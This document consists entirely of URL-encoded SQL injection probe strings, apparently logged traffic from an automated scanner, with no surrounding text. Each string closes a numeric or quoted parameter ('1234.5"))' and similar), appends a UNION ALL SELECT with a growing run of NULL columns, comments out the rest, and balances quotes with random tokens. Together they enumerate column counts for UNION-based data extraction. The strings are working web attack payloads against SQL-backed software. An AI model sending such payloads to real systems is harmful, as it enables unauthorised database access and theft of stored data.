1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22giNy%22%3D%22giNy 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22yYQX%22%3D%22yYQX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22MVLL%22%3D%22MVLL 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22HJWo%22%3D%22HJWo 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22LlSn%22%3D%22LlSn 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22cEgp%22%3D%22cEgp 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22xtxB%22%3D%22xtxB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HouO%22%3D%22HouO 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22VCGo%22%3D%22VCGo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22bqKd%22%3D%22bqKd 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22PFsB%22%3D%22PFsB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22prEO%22%3D%22prEO 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22DJPo%22%3D%22DJPo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22XAlT%22%3D%22XAlT 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22gmEg%22%3D%22gmEg 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ERrl%22%3D%22ERrl 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ttFz%22%3D%22ttFz 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22EafK%22%3D%22EafK 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22QhMW%22%3D%22QhMW 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22SrxK%22%3D%22SrxK 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22TOXp%22%3D%22TOXp 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22rYmZ%22%3D%22rYmZ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22mPuZ%22%3D%22mPuZ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22zDhc%22%3D%22zDhc 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nZxC%22%3D%22nZxC 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22gNaV%22%3D%22gNaV 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22HXPd%22%3D%22HXPd 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22oIGZ%22%20LIKE%20%22oIGZ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ZVrI%22%20LIKE%20%22ZVrI 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22zBee%22%20LIKE%20%22zBee 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22CLEA%22%20LIKE%20%22CLEA 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ZMKV%22%20LIKE%20%22ZMKV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ssSg%22%20LIKE%20%22ssSg 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22QfEZ%22%20LIKE%20%22QfEZ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22oSYl%22%20LIKE%20%22oSYl 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22OPEj%22%20LIKE%20%22OPEj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22DOIv%22%20LIKE%20%22DOIv 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22uvsg%22%20LIKE%20%22uvsg 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22kwrJ%22%20LIKE%20%22kwrJ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22nPzt%22%20LIKE%20%22nPzt 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22NZCK%22%20LIKE%20%22NZCK 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22fHOO%22%20LIKE%20%22fHOO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22ANFR%22%20LIKE%20%22ANFR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22malu%22%20LIKE%20%22malu 